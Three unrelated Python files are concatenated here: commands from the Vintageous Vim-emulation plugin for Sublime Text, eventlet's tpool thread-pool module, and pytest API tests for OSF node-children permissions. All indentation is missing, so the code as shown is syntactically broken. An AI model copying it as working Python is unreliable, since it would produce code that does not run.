class _vi_big_i(sublime_plugin.TextCommand):
def run(self, edit, extend=False):
def f(view, s):
line = view.line(s.b)
pt = utils.next_non_white_space_char(view, line.a)
return sublime.Region(pt, pt)
state = VintageState(self.view)
state.enter_insert_mode()
regions_transformer(self.view, f)
class ViPaste(sublime_plugin.TextCommand):
def run(self, edit, register=None, count=1):
state = VintageState(self.view)
if register:
fragments = state.registers[register]
else:
# TODO: There should be a simpler way of getting the unnamed register's content.
fragments = state.registers['"']
if not fragments:
print("Vintageous: Nothing in register \".")
# XXX: This won't ever be printed because it will be overwritten by other status
# messages printed right after this one.
sublime.status_message("Vintageous: Nothing in register \".")
return
sels = list(self.view.sel())
if len(sels) == len(fragments):
sel_frag = zip(sels, fragments)
else:
sel_frag = zip(sels, [fragments[0],] * len(sels))
offset = 0
for s, text in sel_frag:
text = self.prepare_fragment(text)
if text.startswith('\n'):
if utils.is_at_eol(self.view, s) or utils.is_at_bol(self.view, s):
self.paste_all(edit, s, self.view.line(s.b).b, text, count)
else:
self.paste_all(edit, s, self.view.line(s.b - 1).b, text, count)
else:
# XXX: Refactor this whole class. It's getting out of hand.
if self.view.substr(s.b) == '\n':
self.paste_all(edit, s, s.b + offset, text, count)
else:
self.paste_all(edit, s, s.b + offset + 1, text, count)
offset += len(text) * count
def prepare_fragment(self, text):
if text.endswith('\n') and text != '\n':
text = '\n' + text[0:-1]
return text
# TODO: Improve this signature.
def paste_all(self, edit, sel, at, text, count):
state = VintageState(self.view)
if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
# TODO: generate string first, then insert?
# Make sure we can paste at EOF.
at = at if at <= self.view.size() else self.view.size()
for x in range(count):
self.view.insert(edit, at, text)
else:
if text.startswith('\n'):
text = text * count
if not text.endswith('\n'):
text = text + '\n'
else:
text = text * count
if state.mode == MODE_VISUAL_LINE:
if text.startswith('\n'):
text = text[1:]
self.view.replace(edit, sel, text)
class ViPasteBefore(sublime_plugin.TextCommand):
def run(self, edit, register=None, count=1):
state = VintageState(self.view)
if register:
fragments = state.registers[register]
else:
# TODO: There should be a simpler way of getting the unnamed register's content.
fragments = state.registers['"']
sels = list(self.view.sel())
if len(sels) == len(fragments):
sel_frag = zip(sels, fragments)
else:
sel_frag = zip(sels, [fragments[0],] * len(sels))
offset = 0
for s, text in sel_frag:
if text.endswith('\n'):
if utils.is_at_eol(self.view, s) or utils.is_at_bol(self.view, s):
self.paste_all(edit, s, self.view.line(s.b).a, text, count)
else:
self.paste_all(edit, s, self.view.line(s.b - 1).a, text, count)
else:
self.paste_all(edit, s, s.b + offset, text, count)
offset += len(text) * count
def paste_all(self, edit, sel, at, text, count):
# for x in range(count):
# self.view.insert(edit, at, text)
state = VintageState(self.view)
if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
for x in range(count):
self.view.insert(edit, at, text)
else:
if text.endswith('\n'):
text = text * count
if not text.startswith('\n'):
text = '\n' + text
else:
text = text * count
self.view.replace(edit, sel, text)
class ViEnterNormalMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
if state.mode == MODE_VISUAL:
state.store_visual_selections()
self.view.run_command('collapse_to_direction')
self.view.run_command('dont_stay_on_eol_backward')
state.enter_normal_mode()
class ViEnterNormalModeFromInsertMode(sublime_plugin.TextCommand):
def run(self, edit):
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
if s.a <= s.b:
if (self.view.line(s.a).a != s.a):
new_sels.append(sublime.Region(s.a - 1, s.a - 1))
else:
new_sels.append(sublime.Region(s.a, s.a))
else:
new_sels.append(s)
for s in new_sels:
self.view.sel().add(s)
state = VintageState(self.view)
state.enter_normal_mode()
self.view.window().run_command('hide_auto_complete')
class ViEnterInsertMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_insert_mode()
self.view.run_command('collapse_to_direction')
class ViEnterVisualMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_visual_mode()
self.view.run_command('extend_to_minimal_width')
class ViEnterVisualLineMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_visual_line_mode()
class ViEnterReplaceMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_replace_mode()
self.view.run_command('collapse_to_direction')
state.reset()
class SetAction(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self, action):
state = VintageState(self.view)
state.action = action
state.eval()
class SetMotion(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self, motion):
state = VintageState(self.view)
state.motion = motion
state.eval()
class ViPushDigit(sublime_plugin.TextCommand):
def run(self, edit, digit):
state = VintageState(self.view)
if not (state.action or state.motion):
state.push_motion_digit(digit)
elif state.action:
state.push_action_digit(digit)
class ViReverseCaret(sublime_plugin.TextCommand):
def run(self, edit):
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
new_sels.append(sublime.Region(s.b, s.a))
for s in new_sels:
self.view.sel().add(s)
class ViEnterNormalInsertMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_normal_insert_mode()
# FIXME: We can't repeat 5ifoo<esc>
self.view.run_command('mark_undo_groups_for_gluing')
# ...User types text...
class ViRunNormalInsertModeActions(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
# We've recorded what the user has typed into the buffer. Turn macro recording off.
self.view.run_command('glue_marked_undo_groups')
# FIXME: We can't repeat 5ifoo<esc> after we're done.
for i in range(state.count - 1):
self.view.run_command('repeat')
# Ensure the count will be deleted.
state.mode = MODE_NORMAL
# Delete the count now.
state.reset()
self.view.run_command('vi_enter_normal_mode_from_insert_mode')
class SetRegister(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
if character is None:
state.expecting_register = True
else:
if character not in (REG_EXPRESSION,):
state.register = character
state.expecting_register = False
else:
self.view.run_command('vi_expression_register')
class ViExpressionRegister(sublime_plugin.TextCommand):
def run(self, edit, insert=False, next_mode=None):
def on_done(s):
state = VintageState(self.view)
try:
rv = [str(eval(s, None, None)),]
if not insert:
# TODO: We need to sort out the values received and sent to registers. When pasting,
# we assume a list... This should be encapsulated in Registers.
state.registers[REG_EXPRESSION] = rv
else:
self.view.run_command('insert_snippet', {'contents': str(rv[0])})
state.reset()
except:
sublime.status_message("Vintageous: Invalid expression.")
on_cancel()
def on_cancel():
state = VintageState(self.view)
state.reset()
self.view.window().show_input_panel('', '', on_done, None, on_cancel)
class ViR(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
if character is None:
state.action = 'vi_r'
state.expecting_user_input = True
else:
state.user_input = character
state.expecting_user_input= False
state.eval()
class ViM(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
state.action = 'vi_m'
state.expecting_user_input = True
class _vi_m(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
state.marks.add(character, self.view)
class ViQuote(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
state.motion = 'vi_quote'
state.expecting_user_input = True
class _vi_quote(sublime_plugin.TextCommand):
def run(self, edit, mode=None, character=None, extend=False):
def f(view, s):
if mode == MODE_VISUAL:
if s.a <= s.b:
if address.b < s.b:
return sublime.Region(s.a + 1, address.b)
else:
return sublime.Region(s.a, address.b)
else:
return sublime.Region(s.a + 1, address.b)
elif mode == MODE_NORMAL:
return address
elif mode == _MODE_INTERNAL_NORMAL:
return sublime.Region(s.a, address.b)
return s
state = VintageState(self.view)
address = state.marks.get_as_encoded_address(character)
if address is None:
return
if isinstance(address, str):
if not address.startswith('<command'):
self.view.window().open_file(address, sublime.ENCODED_POSITION)
else:
# We get a command in this form: <command _vi_double_quote>
self.view.run_command(address.split(' ')[1][:-1])
return
# This is a motion in a composite command.
regions_transformer(self.view, f)
class ViF(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
if character is None:
state.motion = 'vi_f'
state.expecting_user_input = True
else:
# FIXME: Dead code?
state.user_input = character
state.expecting_user_input= False
state.eval()
class ViT(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
# XXX: Compare to ViBigF.
def run(self, character=None):
state = VintageState(self.view)
if character is None:
state.motion = 'vi_t'
state.expecting_user_input = True
else:
state.user_input = character
state.expecting_user_input= False
state.eval()
class ViBigT(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
# XXX: Compare to ViBigF.
def run(self, character=None):
state = VintageState(self.view)
if character is None:
state.motion = 'vi_big_t'
state.expecting_user_input = True
else:
state.user_input = character
state.expecting_user_input= False
state.eval()
class ViBigF(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self):
state = VintageState(self.view)
state.motion = 'vi_big_f'
state.expecting_user_input = True
class ViI(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self, inclusive=False):
state = VintageState(self.view)
if inclusive:
state.motion = 'vi_inclusive_text_object'
else:
state.motion = 'vi_exclusive_text_object'
state.expecting_user_input = True
class CollectUserInput(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self, character=None):
state = VintageState(self.view)
state.user_input = character
state.expecting_user_input= False
state.eval()
class _vi_z_enter(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self):
first_sel = self.view.sel()[0]
current_row = self.view.rowcol(first_sel.b)[0] - 1
topmost_visible_row, _ = self.view.rowcol(self.view.visible_region().a)
self.view.run_command('scroll_lines', {'amount': (topmost_visible_row - current_row)})
class _vi_z_minus(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self):
first_sel = self.view.sel()[0]
current_row = self.view.rowcol(first_sel.b)[0]
bottommost_visible_row, _ = self.view.rowcol(self.view.visible_region().b)
number_of_lines = (bottommost_visible_row - current_row) - 1
if number_of_lines > 1:
self.view.run_command('scroll_lines', {'amount': number_of_lines})
class _vi_zz(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self):
first_sel = self.view.sel()[0]
current_row = self.view.rowcol(first_sel.b)[0]
topmost_visible_row, _ = self.view.rowcol(self.view.visible_region().a)
bottommost_visible_row, _ = self.view.rowcol(self.view.visible_region().b)
middle_row = (topmost_visible_row + bottommost_visible_row) / 2
self.view.run_command('scroll_lines', {'amount': (middle_row - current_row)})
class _vi_r(sublime_plugin.TextCommand):
def run(self, edit, character=None, mode=None):
if mode == _MODE_INTERNAL_NORMAL:
for s in self.view.sel():
self.view.replace(edit, s, character * s.size())
class _vi_undo(IrreversibleTextCommand):
"""Once the latest vi command has been undone, we might be left with non-empty selections.
This is due to the fact that Vintageous defines selections in a separate step to the actual
command running. For example, v,e,d,u would undo the deletion operation and restore the
selection that v,e had created.
Assuming that after an undo we're back in normal mode, we can take for granted that any leftover
selections must be destroyed. I cannot think of any situation where Vim would have to restore
selections after *u*, but it may well happen under certain circumstances I'm not aware of.
Note 1: We are also relying on Sublime Text to restore the v or V selections existing at the
time the edit command was run. This seems to be safe, but we're blindly relying on it.
Note 2: Vim knows the position the caret was in before creating the visual selection. In
Sublime Text we lose that information (at least it doesn't seem to be straightforward to
obtain).
"""
# !!! This is a special command that does not go through the usual processing. !!!
# !!! It must skip the undo stack. !!!
# TODO: It must be possible store or retrieve the actual position of the caret before the
# visual selection performed by the user.
def run(self):
# We define our own transformer here because we want to handle undo as a special case.
# TODO: I don't know if it needs to be an special case in reality.
def f(view, s):
# Compensates the move issued below.
if s.a < s.b :
return sublime.Region(s.a + 1, s.a + 1)
else:
return sublime.Region(s.a, s.a)
state = VintageState(self.view)
for i in range(state.count):
self.view.run_command('undo')
if self.view.has_non_empty_selection_region():
regions_transformer(self.view, f)
# !! HACK !! /////////////////////////////////////////////////////////
# This is a hack to work around an issue in Sublime Text:
# When undoing in normal mode, Sublime Text seems to prime a move by chars
# forward that has never been requested by the user or Vintageous.
# As far as I can tell, Vintageous isn't at fault here, but it seems weird
# to think that Sublime Text is wrong.
self.view.run_command('move', {'by': 'characters', 'forward': False})
# ////////////////////////////////////////////////////////////////////
state.update_xpos()
# Ensure that we wipe the count, if any.
state.reset()
class _vi_repeat(IrreversibleTextCommand):
"""Vintageous manages the repeat operation on its own to ensure that we always use the latest
modifying command, instead of being tied to the undo stack (as Sublime Text is by default).
"""
# !!! This is a special command that does not go through the usual processing. !!!
# !!! It must skip the undo stack. !!!
def run(self):
state = VintageState(self.view)
try:
cmd, args, _ = state.repeat_command
except TypeError:
# Unreachable.
return
if not cmd:
return
elif cmd == 'vi_run':
args['next_mode'] = MODE_NORMAL
args['follow_up_mode'] = 'vi_enter_normal_mode'
args['count'] = state.count * args['count']
self.view.run_command(cmd, args)
elif cmd == 'sequence':
for i, _ in enumerate(args['commands']):
# Access this shape: {"commands":[['vi_run', {"foo": 100}],...]}
args['commands'][i][1]['next_mode'] = MODE_NORMAL
args['commands'][i][1]['follow_up_mode'] = 'vi_enter_normal_mode'
# TODO: Implement counts properly for 'sequence' command.
for i in range(state.count):
self.view.run_command(cmd, args)
# Ensure we wipe count data if any.
state.reset()
# XXX: Needed here? Maybe enter_... type commands should be IrreversibleCommands so we
# must/can call them whenever we need them withouth affecting the undo stack.
self.view.run_command('vi_enter_normal_mode')
class _vi_ctrl_w_v_action(sublime_plugin.TextCommand):
def run(self, edit):
self.view.window().run_command('new_pane', {})
class Sequence(sublime_plugin.TextCommand):
"""Required so that mark_undo_groups_for_gluing and friends work.
"""
def run(self, edit, commands):
for cmd, args in commands:
self.view.run_command(cmd, args)
# XXX: Sequence is a special case in that it doesn't run through vi_run, so we need to
# ensure the next mode is correct. Maybe we can improve this by making it more similar to
# regular commands?
state = VintageState(self.view)
state.enter_normal_mode()
class _vi_big_j(sublime_plugin.TextCommand):
def run(self, edit, mode=None):
def f(view, s):
if mode == _MODE_INTERNAL_NORMAL:
full_current_line = view.full_line(s.b)
target = full_current_line.b - 1
full_next_line = view.full_line(full_current_line.b)
two_lines = sublime.Region(full_current_line.a, full_next_line.b)
# Text without \n.
first_line_text = view.substr(view.line(full_current_line.a))
next_line_text = view.substr(full_next_line)
if len(next_line_text) > 1:
next_line_text = next_line_text.lstrip()
sep = ''
if first_line_text and not first_line_text.endswith(' '):
sep = ' '
view.replace(edit, two_lines, first_line_text + sep + next_line_text)
if first_line_text:
return sublime.Region(target, target)
return s
else:
return s
regions_transformer(self.view, f)
class _vi_ctrl_a(sublime_plugin.TextCommand):
def run(self, edit, count=1, mode=None):
def f(view, s):
if mode == _MODE_INTERNAL_NORMAL:
word = view.word(s.a)
new_digit = int(view.substr(word)) + count
view.replace(edit, word, str(new_digit))
return s
if mode != _MODE_INTERNAL_NORMAL:
return
# TODO: Deal with octal, hex notations.
# TODO: Improve detection of numbers.
# TODO: Find the next numeric word in the line if none is found under the caret.
words = [self.view.substr(self.view.word(s)) for s in self.view.sel()]
if not all([w.isdigit() for w in words]):
utils.blink()
return
regions_transformer(self.view, f)
class _vi_ctrl_x(sublime_plugin.TextCommand):
def run(self, edit, count=1, mode=None):
def f(view, s):
if mode == _MODE_INTERNAL_NORMAL:
word = view.word(s.a)
new_digit = int(view.substr(word)) - count
view.replace(edit, word, str(new_digit))
return s
if mode != _MODE_INTERNAL_NORMAL:
return
# TODO: Deal with octal, hex notations.
# TODO: Improve detection of numbers.
# TODO: Find the next numeric word in the line if none is found under the caret.
words = [self.view.substr(self.view.word(s)) for s in self.view.sel()]
if not all([w.isdigit() for w in words]):
utils.blink()
return
regions_transformer(self.view, f)
class _vi_g_v(IrreversibleTextCommand):
def run(self):
# Assume normal mode.
regs = (self.view.get_regions('vi_visual_selections') or
list(self.view.sel()))
self.view.sel().clear()
for r in regs:
self.view.sel().add(r)
class ViQ(IrreversibleTextCommand):
def run(self):
state = VintageState(self.view)
state.action = 'vi_q'
state.expecting_user_input = True
class _vi_q(IrreversibleTextCommand):
def run(self, name=None):
state = VintageState(self.view)
if name == None and not state.is_recording:
return
if not state.is_recording:
state._latest_macro_name = name
state.is_recording = True
self.view.run_command('start_record_macro')
return
if state.is_recording:
self.view.run_command('stop_record_macro')
state.is_recording = False
state.reset()
# Store the macro away.
modifying_cmd = self.view.command_history(0, True)
state.latest_macro = modifying_cmd
class _vi_run_macro(IrreversibleTextCommand):
def run(self, name=None):
if not (name and VintageState(self.view).latest_macro):
return
if name == '@':
# Run the macro recorded latest.
self.view.run_command('run_macro')
else:
# TODO: Implement macro registers.
self.view.run_command('run_command')
class ViAt(IrreversibleTextCommand):
def run(self):
state = VintageState(self.view)
state.action = 'vi_at'
state.expecting_user_input = True
| |
# Copyright (c) 2007-2009, Linden Research, Inc.
# Copyright (c) 2007, IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import imp
import os
import sys
import traceback
import eventlet
from eventlet import event, greenio, greenthread, patcher, timeout
import six
__all__ = ['execute', 'Proxy', 'killall', 'set_num_threads']
EXC_CLASSES = (Exception, timeout.Timeout)
SYS_EXCS = (GeneratorExit, KeyboardInterrupt, SystemExit)
QUIET = True
socket = patcher.original('socket')
threading = patcher.original('threading')
if six.PY2:
Queue_module = patcher.original('Queue')
if six.PY3:
Queue_module = patcher.original('queue')
Empty = Queue_module.Empty
Queue = Queue_module.Queue
_bytetosend = b' '
_coro = None
_nthreads = int(os.environ.get('EVENTLET_THREADPOOL_SIZE', 20))
_reqq = _rspq = None
_rsock = _wsock = None
_setup_already = False
_threads = []
def tpool_trampoline():
global _rspq
while True:
try:
_c = _rsock.recv(1)
assert _c
# FIXME: this is probably redundant since using sockets instead of pipe now
except ValueError:
break # will be raised when pipe is closed
while not _rspq.empty():
try:
(e, rv) = _rspq.get(block=False)
e.send(rv)
e = rv = None
except Empty:
pass
def tworker():
global _rspq
while True:
try:
msg = _reqq.get()
except AttributeError:
return # can't get anything off of a dud queue
if msg is None:
return
(e, meth, args, kwargs) = msg
rv = None
try:
rv = meth(*args, **kwargs)
except SYS_EXCS:
raise
except EXC_CLASSES:
rv = sys.exc_info()
if sys.version_info >= (3, 4):
traceback.clear_frames(rv[1].__traceback__)
if six.PY2:
sys.exc_clear()
# test_leakage_from_tracebacks verifies that the use of
# exc_info does not lead to memory leaks
_rspq.put((e, rv))
msg = meth = args = kwargs = e = rv = None
_wsock.sendall(_bytetosend)
def execute(meth, *args, **kwargs):
"""
Execute *meth* in a Python thread, blocking the current coroutine/
greenthread until the method completes.
The primary use case for this is to wrap an object or module that is not
amenable to monkeypatching or any of the other tricks that Eventlet uses
to achieve cooperative yielding. With tpool, you can force such objects to
cooperate with green threads by sticking them in native threads, at the cost
of some overhead.
"""
setup()
# if already in tpool, don't recurse into the tpool
# also, call functions directly if we're inside an import lock, because
# if meth does any importing (sadly common), it will hang
my_thread = threading.currentThread()
if my_thread in _threads or imp.lock_held() or _nthreads == 0:
return meth(*args, **kwargs)
e = event.Event()
_reqq.put((e, meth, args, kwargs))
rv = e.wait()
if isinstance(rv, tuple) \
and len(rv) == 3 \
and isinstance(rv[1], EXC_CLASSES):
(c, e, tb) = rv
if not QUIET:
traceback.print_exception(c, e, tb)
traceback.print_stack()
six.reraise(c, e, tb)
return rv
def proxy_call(autowrap, f, *args, **kwargs):
"""
Call a function *f* and returns the value. If the type of the return value
is in the *autowrap* collection, then it is wrapped in a :class:`Proxy`
object before return.
Normally *f* will be called in the threadpool with :func:`execute`; if the
keyword argument "nonblocking" is set to ``True``, it will simply be
executed directly. This is useful if you have an object which has methods
that don't need to be called in a separate thread, but which return objects
that should be Proxy wrapped.
"""
if kwargs.pop('nonblocking', False):
rv = f(*args, **kwargs)
else:
rv = execute(f, *args, **kwargs)
if isinstance(rv, autowrap):
return Proxy(rv, autowrap)
else:
return rv
class Proxy(object):
"""
a simple proxy-wrapper of any object that comes with a
methods-only interface, in order to forward every method
invocation onto a thread in the native-thread pool. A key
restriction is that the object's methods should not switch
greenlets or use Eventlet primitives, since they are in a
different thread from the main hub, and therefore might behave
unexpectedly. This is for running native-threaded code
only.
It's common to want to have some of the attributes or return
values also wrapped in Proxy objects (for example, database
connection objects produce cursor objects which also should be
wrapped in Proxy objects to remain nonblocking). *autowrap*, if
supplied, is a collection of types; if an attribute or return
value matches one of those types (via isinstance), it will be
wrapped in a Proxy. *autowrap_names* is a collection
of strings, which represent the names of attributes that should be
wrapped in Proxy objects when accessed.
"""
def __init__(self, obj, autowrap=(), autowrap_names=()):
self._obj = obj
self._autowrap = autowrap
self._autowrap_names = autowrap_names
def __getattr__(self, attr_name):
f = getattr(self._obj, attr_name)
if not hasattr(f, '__call__'):
if isinstance(f, self._autowrap) or attr_name in self._autowrap_names:
return Proxy(f, self._autowrap)
return f
def doit(*args, **kwargs):
result = proxy_call(self._autowrap, f, *args, **kwargs)
if attr_name in self._autowrap_names and not isinstance(result, Proxy):
return Proxy(result)
return result
return doit
# the following are a buncha methods that the python interpeter
# doesn't use getattr to retrieve and therefore have to be defined
# explicitly
def __getitem__(self, key):
return proxy_call(self._autowrap, self._obj.__getitem__, key)
def __setitem__(self, key, value):
return proxy_call(self._autowrap, self._obj.__setitem__, key, value)
def __deepcopy__(self, memo=None):
return proxy_call(self._autowrap, self._obj.__deepcopy__, memo)
def __copy__(self, memo=None):
return proxy_call(self._autowrap, self._obj.__copy__, memo)
def __call__(self, *a, **kw):
if '__call__' in self._autowrap_names:
return Proxy(proxy_call(self._autowrap, self._obj, *a, **kw))
else:
return proxy_call(self._autowrap, self._obj, *a, **kw)
def __enter__(self):
return proxy_call(self._autowrap, self._obj.__enter__)
def __exit__(self, *exc):
return proxy_call(self._autowrap, self._obj.__exit__, *exc)
# these don't go through a proxy call, because they're likely to
# be called often, and are unlikely to be implemented on the
# wrapped object in such a way that they would block
def __eq__(self, rhs):
return self._obj == rhs
def __hash__(self):
return self._obj.__hash__()
def __repr__(self):
return self._obj.__repr__()
def __str__(self):
return self._obj.__str__()
def __len__(self):
return len(self._obj)
def __nonzero__(self):
return bool(self._obj)
# Python3
__bool__ = __nonzero__
def __iter__(self):
it = iter(self._obj)
if it == self._obj:
return self
else:
return Proxy(it)
def next(self):
return proxy_call(self._autowrap, next, self._obj)
# Python3
__next__ = next
def setup():
global _rsock, _wsock, _coro, _setup_already, _rspq, _reqq
if _setup_already:
return
else:
_setup_already = True
assert _nthreads >= 0, "Can't specify negative number of threads"
if _nthreads == 0:
import warnings
warnings.warn("Zero threads in tpool. All tpool.execute calls will\
execute in main thread. Check the value of the environment \
variable EVENTLET_THREADPOOL_SIZE.", RuntimeWarning)
_reqq = Queue(maxsize=-1)
_rspq = Queue(maxsize=-1)
# connected socket pair
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
sock.listen(1)
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(sock.getsockname())
csock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
_wsock, _addr = sock.accept()
_wsock.settimeout(None)
_wsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
sock.close()
_rsock = greenio.GreenSocket(csock)
_rsock.settimeout(None)
for i in six.moves.range(_nthreads):
t = threading.Thread(target=tworker,
name="tpool_thread_%s" % i)
t.setDaemon(True)
t.start()
_threads.append(t)
_coro = greenthread.spawn_n(tpool_trampoline)
# This yield fixes subtle error with GreenSocket.__del__
eventlet.sleep(0)
# Avoid ResourceWarning unclosed socket on Python3.2+
@atexit.register
def killall():
global _setup_already, _rspq, _rsock, _wsock
if not _setup_already:
return
# This yield fixes freeze in some scenarios
eventlet.sleep(0)
for thr in _threads:
_reqq.put(None)
for thr in _threads:
thr.join()
del _threads[:]
# return any remaining results
while (_rspq is not None) and not _rspq.empty():
try:
(e, rv) = _rspq.get(block=False)
e.send(rv)
e = rv = None
except Empty:
pass
if _coro is not None:
greenthread.kill(_coro)
if _rsock is not None:
_rsock.close()
_rsock = None
if _wsock is not None:
_wsock.close()
_wsock = None
_rspq = None
_setup_already = False
def set_num_threads(nthreads):
global _nthreads
_nthreads = nthreads
| |
import pytest
from api.base.settings.defaults import API_BASE
from framework.auth.core import Auth
from osf.models import AbstractNode, NodeLog
from osf_tests.factories import (
NodeFactory,
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
)
from tests.base import fake
from website.util import permissions
from website.util.sanitize import strip_html
@pytest.fixture()
def user():
return AuthUserFactory()
@pytest.mark.django_db
class TestNodeChildrenList:
@pytest.fixture()
def private_project(self, user):
private_project = ProjectFactory()
private_project.add_contributor(
user,
permissions=[
permissions.READ,
permissions.WRITE
]
)
private_project.save()
return private_project
@pytest.fixture()
def component(self, user, private_project):
return NodeFactory(parent=private_project, creator=user)
@pytest.fixture()
def pointer(self):
return ProjectFactory()
@pytest.fixture()
def private_project_url(self, private_project):
return '/{}nodes/{}/children/'.format(API_BASE, private_project._id)
@pytest.fixture()
def public_project(self, user):
return ProjectFactory(is_public=True, creator=user)
@pytest.fixture()
def public_component(self, user, public_project):
return NodeFactory(parent=public_project, creator=user, is_public=True)
@pytest.fixture()
def public_project_url(self, user, public_project):
return '/{}nodes/{}/children/'.format(API_BASE, public_project._id)
def test_return_public_node_children_list(
self, app, public_component,
public_project_url):
# test_return_public_node_children_list_logged_out
res = app.get(public_project_url)
assert res.status_code == 200
assert res.content_type == 'application/vnd.api+json'
assert len(res.json['data']) == 1
assert res.json['data'][0]['id'] == public_component._id
# test_return_public_node_children_list_logged_in
non_contrib = AuthUserFactory()
res = app.get(public_project_url, auth=non_contrib.auth)
assert res.status_code == 200
assert res.content_type == 'application/vnd.api+json'
assert len(res.json['data']) == 1
assert res.json['data'][0]['id'] == public_component._id
def test_return_private_node_children_list(
self, app, user, component, private_project_url):
# test_return_private_node_children_list_logged_out
res = app.get(private_project_url, expect_errors=True)
assert res.status_code == 401
assert 'detail' in res.json['errors'][0]
# test_return_private_node_children_list_logged_in_non_contributor
non_contrib = AuthUserFactory()
res = app.get(
private_project_url,
auth=non_contrib.auth,
expect_errors=True)
assert res.status_code == 403
assert 'detail' in res.json['errors'][0]
# test_return_private_node_children_list_logged_in_contributor
res = app.get(private_project_url, auth=user.auth)
assert res.status_code == 200
assert res.content_type == 'application/vnd.api+json'
assert len(res.json['data']) == 1
assert res.json['data'][0]['id'] == component._id
def test_node_children_list_does_not_include_pointers(
self, app, user, component, private_project_url):
res = app.get(private_project_url, auth=user.auth)
assert len(res.json['data']) == 1
def test_node_children_list_does_not_include_unauthorized_projects(
self, app, user, component, private_project, private_project_url):
NodeFactory(parent=private_project)
res = app.get(private_project_url, auth=user.auth)
assert len(res.json['data']) == 1
def test_node_children_list_does_not_include_deleted(
self, app, user, public_project, public_component,
component, public_project_url):
child_project = NodeFactory(parent=public_project, creator=user)
child_project.save()
res = app.get(public_project_url, auth=user.auth)
assert res.status_code == 200
ids = [node['id'] for node in res.json['data']]
assert child_project._id in ids
assert 2 == len(ids)
child_project.is_deleted = True
child_project.save()
res = app.get(public_project_url, auth=user.auth)
assert res.status_code == 200
ids = [node['id'] for node in res.json['data']]
assert child_project._id not in ids
assert 1 == len(ids)
def test_node_children_list_does_not_include_node_links(
self, app, user, public_project, public_component,
public_project_url):
pointed_to = ProjectFactory(is_public=True)
public_project.add_pointer(
pointed_to,
auth=Auth(public_project.creator)
)
res = app.get(public_project_url, auth=user.auth)
ids = [node['id'] for node in res.json['data']]
assert public_component._id in ids # sanity check
assert pointed_to._id not in ids
@pytest.mark.django_db
class TestNodeChildrenListFiltering:
def test_node_child_filtering(self, app, user):
project = ProjectFactory(creator=user)
title_one, title_two = fake.bs(), fake.bs()
component = NodeFactory(title=title_one, parent=project)
component_two = NodeFactory(title=title_two, parent=project)
url = '/{}nodes/{}/children/?filter[title]={}'.format(
API_BASE,
project._id,
title_one
)
res = app.get(url, auth=user.auth)
ids = [node['id'] for node in res.json['data']]
assert component._id in ids
assert component_two._id not in ids
@pytest.mark.django_db
class TestNodeChildCreate:
@pytest.fixture()
def project(self, user):
return ProjectFactory(creator=user, is_public=True)
@pytest.fixture()
def url(self, project):
return '/{}nodes/{}/children/'.format(API_BASE, project._id)
@pytest.fixture()
def child(self):
return {
'data': {
'type': 'nodes',
'attributes': {
'title': 'child',
'description': 'this is a child project',
'category': 'project'
}
}
}
def test_creates_child(self, app, user, project, child, url):
# test_creates_child_logged_out_user
res = app.post_json_api(url, child, expect_errors=True)
assert res.status_code == 401
project.reload()
assert len(project.nodes) == 0
# test_creates_child_logged_in_read_contributor
read_contrib = AuthUserFactory()
project.add_contributor(
read_contrib,
permissions=[permissions.READ],
auth=Auth(user), save=True
)
res = app.post_json_api(
url, child, auth=read_contrib.auth,
expect_errors=True
)
assert res.status_code == 403
project.reload()
assert len(project.nodes) == 0
# test_creates_child_logged_in_non_contributor
non_contrib = AuthUserFactory()
res = app.post_json_api(
url, child, auth=non_contrib.auth,
expect_errors=True
)
assert res.status_code == 403
project.reload()
assert len(project.nodes) == 0
# test_creates_child_no_type
child = {
'data': {
'attributes': {
'title': 'child',
'description': 'this is a child project',
'category': 'project',
}
}
}
res = app.post_json_api(url, child, auth=user.auth, expect_errors=True)
assert res.status_code == 400
